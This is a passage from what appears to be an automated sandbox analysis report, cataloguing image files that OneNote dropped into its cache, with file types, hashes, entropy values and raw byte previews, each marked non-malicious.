Preview:	.PNG........IHDR...(...o.....>.c.....PLTE................................................................................................................................................................................................a.o.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.Y.. ..........}%.../].`<..y....V...m.....<....)..;Ki..'9...2.:.c...t..V..d.t;-y.Z.=K>B.."{Lj.~G..\|..ENC.!Sw,....";.p..g....E.B..S.-...k..P."..E......l[./D.-.....Q+.G<>.+..b...#..y(...{a.M..J...<....v.W..F.qm.`.....(.mk.nX....l.Px8.0\Z....7G...$*.....&..Z.VJ.~......J.2\|...2H..../...=.)q....ZT" .,%..h.p....Z$.!........r...Hh.f. ....P .d..1d....2.3h....;.A.... ....d..g4...A..^.....2.ew..."h...y/..j.h..B.......%.2.%..{r...+dG.=9h....P1...A...c...^h.]Q0.8x....q .!3....ZW"Z.!3...G.vC.GG..".&..X!3.\|xB..V.P!.+zS..NX!3.....Nh.y(.Z.1.h..B...Z+....l8Xcu.B...K...@U..@Q...mB...x...&L C....mB.....@kC...Y.,.... ..e\F.B..........y..e\..:$(....Z.a...yn...f..z.~Q.{o...].ln.r....^.@.{..c.7..{...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008D.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	40035
Entropy (8bit):	7.360144465307449
Encrypted:	false
SSDEEP:	768:MQhziQo1RKGlyyzYjlxuxwRUj/BN837xRmwH2uDTCn8qXFQziN:ThzrSzalg6O563l4uTC8q1Ig
MD5:	B1DDD365D87605F96D72042CB56572F6
SHA1:	ADF71DAD1A62B8A58A657C2EDBDD665A19EB846B
SHA-256:	06E09DE80C3F32254DA4FE6B2CBAD7C05EF144DD54B8C65745E195BBF7317A2E
SHA-512:	9C686092CC9524F34EA6CEC9AAE936A6225BCC54DE38DE1786EBA8F532959A80FF885E8664A09E4C318D7CA4B278E807D3D1F135BE55F30979B844FF5EC9699A
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!1....AQ.aq.....".3.5...2B#s.$%..Rr.CS4&6...bE'7.c.DTtU...d.eu...VFfv.Gw.....Wg......................!...1AQaq........"2..4..Rbr#3$...B.s5Cc.S%.D............?..^.f....R.N{.{f.....O.r.V.;U..~...U.(..>M._.yI.{8,..^.t...s`...j.O..U5t.&&..h.G.6Da.;.....J.......E..QD...C...}..N...tR.....~..].J:.V$..r......]...W......4.[.)6..Y_.....4...........m._'HR.a......]U=.....n...0.W..]..K..){.+...w...f...<\|..1/.\|.....b..-..y....]U#Ctn.7m.._.\|..2I;\|....tM....q.q.}.N)....'...9&...nR...R..}.........m._.LZ}u.../K....9.~..?.{....V.#..dx.Zk.:=..:.j].....E#....E~w%....J..[S..[......gr...vb.r]..<..ut..i...[P.w....:..Gkn>......#..m...9km`......t).up.....w....VOR.{&.nQI..}...wD.7Ey#n....MO.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008F.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:10:32], progressive, precision 8, 594x773, components 3
Category:	dropped
Size (bytes):	242903
Entropy (8bit):	7.944495275553473
Encrypted:	false
SSDEEP:	6144:YVxOYlZX2kCWfYoFMXC/sBFC9r+4iEGM4rrcPoWmwkU6FJ:+OwZ2kbFMC/L99ifvokU6/
MD5:	C594A4AA7234EF91E6C2714CFE1410F1
SHA1:	C0F720D4CE3196852814D0B7347F0CAA0C6FD526
SHA-256:	10C833E47BE1C8496F949A6B059C2D79212A4DD66BDE62116EA337FA4FE0B654
SHA-512:	7313F6545A334F9E2DE5430B2DB5C419C4C8A40E075338DAFCD74970BCC6309786946E5DFB57531612BF4C6269495655706D920FD99922FDACFF9796710DA9C0
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:10:32.............................R.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................{.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...v&.F;-v;}FH..Z...N..)Y.......h;C....G.0W..ww...MI..Z+..\.........c..4.1.~.Yo.Y6.&. q...............l.A#.~s?yYg..7ky...r

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008H.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:12:29], progressive, precision 8, 598x766, components 3
Category:	dropped
Size (bytes):	70028
Entropy (8bit):	7.742089280742944
Encrypted:	false
SSDEEP:	1536:ub4bgbB7g9cKCmSzaNF0jAdAzQKTEFBQqUp/i0yG1pidLHTVX:ub4bIB7Qg2OjbzjgWp/i0yGCZx
MD5:	EC7811912ACA47F6AEB912469761D70D
SHA1:	C759BC2D908705D599B03BDB366C951B11F99A4E
SHA-256:	FBB4573E3BEE1B337077691BEBAE15D6FAC52432405D31396D526D7694A8283D
SHA-512:	881828150993A8C56E36CDA2051D89C1F6E0322643902C9506392C163E8734A2933A46486F40E5BC8C8D0164E180605E52620EF22FE14540AEA787A38B22E98E
Malicious:	false
Preview:	......JFIF.....H.H.....7Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:12:29.............................V.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................}.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....H.yM..? .Z.. .^.x..p.8.A...K.... .\{..)..y....t..=.^y)..v.@.W>. .h.. ..p.:.\)(.$....$.I).....!....E..Z.....&.5.).

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008J.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:19:29], progressive, precision 8, 221x792, components 3
Category:	dropped
Size (bytes):	24268
Entropy (8bit):	6.946124661664625
Encrypted:	false
SSDEEP:	384:d2wiieoHTRh5a1HAteZCWOZIM+L7WhNjYn:8wHFHJ+/OZIKhNO
MD5:	3CD906D179F59DDFA112510C7E996351
SHA1:	48CDB3685606EDD79D5BCDF0D7267B8B1CCBD5A8
SHA-256:	1591FD26E7FFF5BE97431D0ED3D0ADE5CFC5FA74E3D7EC282FD242160CE68C1F
SHA-512:	2048CBA13AF532FF2BCC7B8B40541993234BD1A8AB6DE47B889AF3F3E4571F9C5A22996D0B1C16DD6603233F6066A1A2A97C16A6020BEDD0826B83BAD0075512
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:19:29.....................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................$.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....)......[]t.\Z..g......A....&D.$LH._..X..Xl...`....cZ.X.........>......f.Z.X...]..~L.S..@..I$..I.IO.....x...s.g.[f.h{9..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008L.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	47294
Entropy (8bit):	7.497888607667405
Encrypted:	false
SSDEEP:	768:aQ10VrIBdBvDpQrQ7P9/FUOLG2vTSeG9lkCsMKzXeMBk3CBp:aC0JIBL+QsOLG2+ZAC1KqM2I
MD5:	7A450E086AD14BA7D89BA5DB3D3AE6C7
SHA1:	E7AEAFCFCE476390E18C19456BDF6529D863D518
SHA-256:	BDD997068701ED3A00A224EB694B003C01AC69B857FE7B4147D6C34875B1632B
SHA-512:	9B6D50A6CDB6081DA107A2CDDB1BD2811A5764994C8E3F67D56CA81084BE0D068C27435154E867199F38688EA65E8DE02A56DCAC47D0F5E55F0FBB6598814938
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..A..Qa"..q..2.......B#...R%.r...$&b...3Ss.4dU6F.cE..'GC..t..5eufW......................!.1..AQ.aq..".....2BR......r.#3.d...b..Ccs.t......$4T...SD%5Ue&Vf............?..M.7(..).:.a.q.......>..[:O...afQ.uCO..U.....go.l..p..YqVklQ.{i.w&.]Z.\+JQw._.n.'.h..,.bj..X.].k&.Q.>gU..f...1\|....[...jQ.%Zb.......t............V..j.6....Vj..i.....?...IY.P.....$.j........[l.....S.4.J9.U\.......7I..[..=N5....xW..../...=?n....uG.D..S.>...8..3........n.S....]k.*...4.>.R.o..{..l.H.#.^....<amG.m&.......,....wDY.W.m.X....We.IR.Nu...y..Z.l.._S.mr.m...y.]m.R.MT...6.5.5}.K..#%..k].7.Y.q]...%.r.7.R^jR..z.K.T[t.a..d.)glW.r.v,.`....O..^..o:.Uc.\..D....f..D......yt.Q...Y.....

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008N.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 60 x 336, 4-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	347
Entropy (8bit):	6.85024426015615
Encrypted:	false
SSDEEP:	6:6v/lhPtnlx/QulkWNY2V18A6Akp7eee1VDjMHCyLezyKUX5Gp:6v/7RrIubiA6AkpNhiyKe+
MD5:	78762C169F8B104CB57DFF5A1669D2DF
SHA1:	9638B71B584CD636834016A635ABF8D9C0887711
SHA-256:	E64FDCD0B108737D8B8F7B677029F924031D6BBAA50585D9C3DEF7C7E92ECAF2
SHA-512:	5ED899AAF73B72DEC32E171FFA112382667D5BF3FBA98C92E313E66C0A6975EA97068F4CD32B62283F18DBD5345C11E3610F7EEAC2F2DE71FC44593180B9CEAC
Malicious:	false
Preview:	.PNG........IHDR...<...P.............PLTE......................=l......bKGD....H....cmPPJCmp0712....Om......IDATh......@..aI...B..C..l...^.%.`....>.]..\|0.....a...hb...0......q.......p"....;...K..x=...p...y.yy~J....\|...\.......y..X.......'...>1...Ky..f....&........N`..f0..b...3.......`Z.3..3.....o.......4.&........SV...4.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008P.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 40 x 617, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	827
Entropy (8bit):	7.23139555596658
Encrypted:	false
SSDEEP:	12:6v/7Hs2NwBW1mtjeSfaTHHy05riYUtr8y8PQvPYzzg979Reip0QPqc:oOsotazy4rStr8y8PQIzWea0Qv
MD5:	3E675D61F588462FB452342B14BCF9C0
SHA1:	86B62019BC3C5BE48B654256B5D10293FC8C842A
SHA-256:	639EADAD468B6B32B9124B1F4395A8DA3027FF7258D102173BA070AE2ED541AE
SHA-512:	E6EA855B642ED36FA82F8E469A826DC57EB0C36E307045FF8D166F67AF9242C87840833BE31FBE4706DC54100E999D6A3D3A78D0633A3114735818874AD34758
Malicious:	false
Preview:	.PNG........IHDR...(...i..........`PLTE...................................................................................................bKGD....H....cmPPJCmp0712....H.s....qIDATx^...0.Cg.;......@j..2c.=~KP.[H~..@..8...?U.g.n.a=.=.).....3..u^(.....L....5..........8.}..T.f.n.a=.=.).....3..u^(.....L..r....s..8.....W]....,..9..G?.a..`c.z...E.p...)Y.P.....#....@9.7].....,..9..G?.a..`c.z...E.p...)Y.P...`b....0.b.+~{.Pu...1..<..0._.l.@O.y.(...V3%..J....s... .(g.+.qyWu...1..<..0._.l.@O.y.(...V3%...%R.L.Q..x..R.<t.o......7.............:/.E..j.da@i..`b..Z......u.>.?...7.............:/.E..j.da@.Dj..9.W....s. .....:.......L...">w..7... .....:..."...L..."..a....D..Ya.l....E.{.@&.\|.._...7..D..Ya.l.....{.@&.\|....0.J.."z.0s..s....=g ..>........"z.0s..s....=g ..>..l..1...y..g......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008R.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 50 x 600, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	4410
Entropy (8bit):	7.857636973514526
Encrypted:	false
SSDEEP:	96:E/pQuIhKZ7u06dICH3AroiTe8DGTl55poBUmLNjpH7MvDHjfm:MpdZtPbknnRPpkLNVMvu
MD5:	2494381A1ACDC83843B912CFCDE5643B
SHA1:	98F9D1CC140076D1AE5A9EA19F47658FD5DF0D66
SHA-256:	5EEBE803E434A845D19BC600DF3C75E98BB69BD0DE473CEEC410D1B3A9154E28
SHA-512:	0E64CC3723DC41D94910F7ADFB6A0DFB5049350FD15A873695614E4A89ABD78B166BA4E9C8CB95E275FB56981539DECD2A7F28FBC25E80DD5E2DEA8077CC9489
Malicious:	false
Preview:	.PNG........IHDR...2...X.......E.....PLTE...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................B..(....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.].\TU.?3"...(..L........q.Q...H.*j......W..Xd.ie.f..%.XT...em..m.m.vkik...>.}..}\|..{'.U..~......}....s.............,CVu.x.:C..5...;.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008T.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	136726
Entropy (8bit):	7.973487854173386
Encrypted:	false
SSDEEP:	3072:SIXmy5Tl704vW2ZKkvV8UU0ZWUF0BJwySIdgz816YzDc1+opecYPn:Sny5Tl704fZFV8UU6LGXwyS4xohpQPn
MD5:	4A2472AC2A9434E35701362D1C56EDDF
SHA1:	16FA2EA2D2808D75445896E03B67A93000EEDDD8
SHA-256:	505F731CB7707EFAB2EB06685B392DC7E59265A40B55AAE43E5DC15C0A86CBA4
SHA-512:	5E28D8FB2AC62ED270968072A30013334461F7CAE96058AF9EAA6E10912989DC47112D2133892BF61F7A516B77C6FF71BA2A000B750A9F95C787E538B09595C2
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..AQaq".....2B....R#..b3...r...C$...X.....Sc...9.%'.(Hs4Dgw..T..5GW.x.)......................!.1..AQa"2.q.......B..#c........b6.Rr.3s$.&..S...C4.%5............?.........(......(......(......(......(......(......(......(.G/.GE&...)..P.x..B.({i2Y;.z?G...Yfc.)H..^....#.....}3..Sc^.H..+...M.a.P.....GS.....H_.3..<....1f........1.<.\..nn-..s.s.\9Y....=.......S.0.......N..cA..Io..r.3..........ay.....K.....,.;9..Q......xO.Fa.2..>........{4k.....\|....?U....3.8..._/3....#.. t.y......yY.......e.<........#.....B.....Z.%.Y..S.ye.W4...l.......X...%.@y}>....l.yi..D..W......L..._D.Q....)...E....n.%...*..K.4#.8`..I....h..h.o..I......-...hB...3..u.(5..........n...,.@....a.t.9.....@.s.>.&...@

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000008V.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 77 x 627, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	5136
Entropy (8bit):	7.622045262603241
Encrypted:	false
SSDEEP:	96:djzuNKb3XHco17p2wolIxIx7lpskdsC/ddWNKeabJbMojpxLDTu1:VzuNKb397pwlIxKp7qs3bJb5FBTw
MD5:	FA38AFA965141EA3F17863EE8DCCDE61
SHA1:	2B4611E651AF7549C1AA73932B1136B561A7602F
SHA-256:	E1CB1A0EC9BE62D5445C73AA84DF38234002A7E164EE830C9DF24997802CB5D2
SHA-512:	A372674F5CA343321BA9C413D346070709F7685706C9C6C3DC7F61846B59253A5E6FE800DBA10AE870FD3887439B2AA106FBBB51751E92A163938A4393C43E28
Malicious:	false
Preview:	.PNG........IHDR...M...s.....}8nv....PLTE.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................z`.....tRNS...................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000091.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	52945
Entropy (8bit):	7.6490972666456765
Encrypted:	false
SSDEEP:	768:cjvqR0XvFaGCTJffi0tgybmWDoTw71kHUAnjvawrlp2+NUO8dWSNl3PF2PjK/q09:cyRffflgybmWoTw1UUADHUbU21MjpAD
MD5:	AD003F032F32FAC4672D4CE237FA5C5B
SHA1:	AE234931B452F0D649D91291763B919CF350EA49
SHA-256:	ADB1EBBE18D6CD8FF08AA9BF5C83CDB83BF9AA179698E34E93DBCDDE12F04D32
SHA-512:	ECA25FA657ECE3A66D3E650628E0F65D3BADD38864C028AB6553950A1A66D7D55482C85E9E565573E9E5AAFA91C2D53235971C644A266D41EB69F8E72E3A843B
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..AQ..aq....".....2....BR#r.b3$...C.Sc%...s5E......................!1.A..Q.aq"...2...#...B...Rb3..$..CSr...6............?......y_N.e.H7?........W..w....k\|...S..d.4.>.RW5z.$.i.)V.O....>o...c..&1.D..O..".ufbb..1...t..u=..K...m...~.....F..-.fb:i..=f..C.w.[{..~.7k....;..:..3....4.....$..m]...}....~q...9T.#..7.~..8...q.N;c..ffo.w...W..d........../t_........lWJE..).>..v;:=....Rrw#.m.n.n...E...vm.J}2N..\|.4...80.#..e....t.J..ZQ.x\|g/....F..e....k+vK...M..W.X.e.L..~...j.....kz....=...n:O.:..[.L,.+R...Y..zKNI....,..{e..U.'...}.......\|..t.]...~...b4......_.i..../.......m...a..n...v.j.?..Rc.$G\|.31..#..$?.........h.w....-... .a.%z..u......u.A....Fm..J.......G..[...w.....:....w/.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000093.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	79656
Entropy (8bit):	7.966459570826366
Encrypted:	false
SSDEEP:	1536:2kuUliOeU4os8ii3nF3Hxro/qxXD9u/kjYgMZqoEs6ZUldm:3uUsOXYIAixR2k7WAZV
MD5:	39FF3ACAE544EAC172B1269F825B9E9F
SHA1:	2D40DE8D90BD21D56314D3F99CEF4FBAE3712C0F
SHA-256:	70475431CCA3C91A4EFA3B8F04864371D2D3A45696674A1A0562FE9CD8DB287C
SHA-512:	3B9F3B32696AB7779864E83DC0C45960114A130BEE0CF4D0643DE57FF952171E5D775AA49141EE31A28A9B5D052B26EB421F26EA736D7EF4B3A7EC812CA411CB
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!.1A.Qa"..q.....2#..BRb..r3$.Cc..Ss.4...D%5&..T...'7....................!1.A..Q.aq..."2.....B3.r.#..R...bc$4..D.s%............?..Y..T.o.\......=.a..j..'^..s..[../........Y.......<...(..4.....7y..Ln.[9.cK.ilN...u@$.V.9.V?3..s.KL.z..w.jW.C.............@.~+.o?o8...k....,.m..9.".....q.....d....z.W...q...~...'..e..>..f#...S.....F....pU.......7..N.vfK......S..G.#.....}.c.........RXt.bq1.`.....[+8\..N..:......}.....r..........')......Na...&...m......c...a4_%d.............co..0.n.L.Q..E.Lt..y.\|..F..4.i(>.._..\.eNL8..?z9I:hLgC.@.p....g.t......'.I!d..?1f..R..........\|..4.wJ..%g..~0bt.....*...v.......O...:.~.>~..o.x...9.@>...s.&.E.0/G.c..t.<..F.t.A.z. ......;.........Gp.P

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000095.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	40884
Entropy (8bit):	7.545929039957292
Encrypted:	false
SSDEEP:	768:MCBOA4d+ElOXJ/3pI7cRBiL7L6qERqGz65WXzZqJsKQSbIsTT6XB:hIAU+2cGdLX6qBG4WDZl4Ihx
MD5:	7379775A1E2AB7FAB95CFFCE01AE05F3
SHA1:	3D3DDFD8AC7E07203561BAE423D66F0806833AB3
SHA-256:	9301DB6D2D87282FCEE450189AEACE16D85F64273BF62713A3044992B6B7A9E9
SHA-512:	4B5006E620E80D3A146944649CF4CA619782CAD7E8C4CD0D1DE0EBCA0FA05EACB7378DAFCEED3E26F5698B07F19604614D906C8F51F898660E2F129D8DEC6F62
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!.1A.....Qaq....".....2....BR#S..br...3T...C$.7(Hx....4D.G..Xh.cs..'..t...%...8.....................1...!AQ..a...q"2.4Tt.......R3S....Br...#s...Uu.bc.de..$D..6..C%E..............?...z...;sB.yv...........]t.\...n...../....m....M.=.3G+..x+.....S).*&.J../..8..O/+..sG...p...<!....~.c..C.w..,[oHom.wc-.J.~.......L[..6...'..i_..S;...!Y.z.q].EK..M.x...i.x.+.;.+...}....#......f.)........e6V..p.;........s.)..Ml.J......IU.6...<9+9.^..l..Y...[._...2..^..j.ia...._..3.;...~..<3...;......z.^.......]..Qk.,...Yk...3.3Jy^p.}....q...I...&..t.......;..9.g.GH;..'...%...)..[..y..../...zCn..>...'...1e.Y..;....]..7...N>t..m-.j.............H^..T\.q.ru...}...eTn]I'r.^].#..wOY....v

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000097.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:05:55], progressive, precision 8, 612x618, components 3
Category:	dropped
Size (bytes):	68633
Entropy (8bit):	7.709776384921022
Encrypted:	false
SSDEEP:	1536:tapXpSTJDOkFGdJdBk/slsbfsw1imaapnbvD8:U2OjJr6b07m1bvD8
MD5:	41241EE59AB7BC9EB34784E3BCE31CB4
SHA1:	98680761A51E9199CF3C89F68B5309FBEC7EE3CB
SHA-256:	035B26DF61855A3F36DBD30FDAB0C157C04C9E8AE2197EA4D4AEB3E82E6A4C2B
SHA-512:	3EE331D5BCEE4AD5D3FC9661D4AB4053F7D351591A094334F963C33C9D0E32CCCABE9334AD7C308108CE99617E064FE848DCD469ACD8D83FBE5C4452DE523D8F
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:05:55.............................d...........j...........................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?../$.W:SZ./...9.....-...u......r.....].c...@W_.7...+......v.+PD.I..-<1.pDn-\.....p.$....0.}V....\..>.~..XN.o..l(E....ik..o.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000099.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 176 x 513, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	11043
Entropy (8bit):	7.96811228801767
Encrypted:	false
SSDEEP:	192:YyroOCsBI9pkCFsHHX2RE6VOlPuIqmBtJNBfAr+ADP1IATaNeTyZ4GF+WQQ6Qwq2:BUOCsB2kCGH32RiPDtDBfArPDP1I/eyM
MD5:	8E9AB9C28B155A66BC5C0DA5E2A4EFB5
SHA1:	972E61F162D48F1CEE21963ECBB2FE439105DB55
SHA-256:	B243A24FA13BC8523450E22F408F9EFF15301C938F8CA52A57018B58CE6785DE
SHA-512:	12062D69E676B3B34AFCEF25AC17B40294282D5BAB6C0110680293D7CC96EC17EBCFE104C284E64A30EE3C483E319E9C37C03F6EE82C79632180E45C7A684E8C
Malicious:	false
Preview:	.PNG........IHDR..............`....`PLTE............................................................................................... .......bKGD....H....cmPPJCmp0712....H.s...*YIDATx^.]...,.N.8.i......0..e..y.......8.6....Fo.........=...F..._..........O..{..............3.\|.L.\|.............>.....v..n.1J...k...."....7........J._.5LQ`..k...._Z.W.x:..k...g..._.....u<.Q{...1...q6.cs...l............30.g...< W...a.5..>O....9}..c..........s\|I.).>.fo4.<q......>...c.:.u..co.#.7,.O..G./.K.\|..q.p...(.(....iH.......m..+.7...../..{W.l....b....?.`^.q.9L&.>.hN2`1..m...]$.0J....rBy......{.._...G....;.r.Q..;..,...9..F...t;.+..2.Ub......V...8.k..5.........'[..s.H..).......%j._.&.....BN..V..q...T...#..........0.E&.o7....$..m..8g.f._$..k.8...5......HgQ...L..\.........)B.I.r.(..8.a..$N.9.=..o..Q..(.e.a..O.....c.= .......$0..X.S,..(p......$..l.c.I...=."......g....^..#~,&.a9iK..ZNE`...pFJ.@Wd?.<..Bt.E.......e...i.%d...}.!..B......9.........B}.....5...;..hL.D.....4z.....\|.)

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000009B.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 40 x 650, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	647
Entropy (8bit):	6.854433034679255
Encrypted:	false
SSDEEP:	12:6v/71rwqZMXVs99W1YvpLp/Fvl+f43ocLtuplb+CrGotLRd:+wqWXVs99rpLpNvr3pIx3b
MD5:	DD876AA103BEC3AC83C769D768AD39FB
SHA1:	1833603AA9B6A7E53F9AD8A336F96CCE33088234
SHA-256:	1262DD23AD54E935CFA10FEB1BE56648E43BEF1116696CA71D87E6E033B1CA7D
SHA-512:	946DB2277213104A3B29EC4388578B05027B974A3093B4CCAD8847397AA51AE308BC6A199E5705E1F901D6E4B1BA34D8DECFD6E5B6685184A307D749D7CFAEDD
Malicious:	false
Preview:	.PNG........IHDR...(.........xk....`PLTE.........................................................................................>.S.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.)..1..7w....6.*.H`T6.ha.k.............b!....Ba..C..P.4K..@.....h.E..X....PX+.P.-.....@@"...o.O4....xZ<...B...B..,A..y.s<......b!....Ba..C..0_p. .......=..,...i. ...=.j..N...........{4+...xZ<...B....\|.....$.K<.vyE..X....PX+.P.-.:... .'p......\,...i. ...=.j........K.....%J..S+.....q..k.H.@DD.s...:..J.K.DDL.\.@`,.DD.:.(]..N....KD....A M.....F..S+.....1.sq........\.t..;..../...~k...4.DD.:..]..N....KD........@DD.s...:..J.K..[...Q....V......IEND.B`.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000009D.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:27:10], progressive, precision 8, 102x792, components 3
Category:	dropped
Size (bytes):	52912
Entropy (8bit):	7.679147474806877
Encrypted:	false
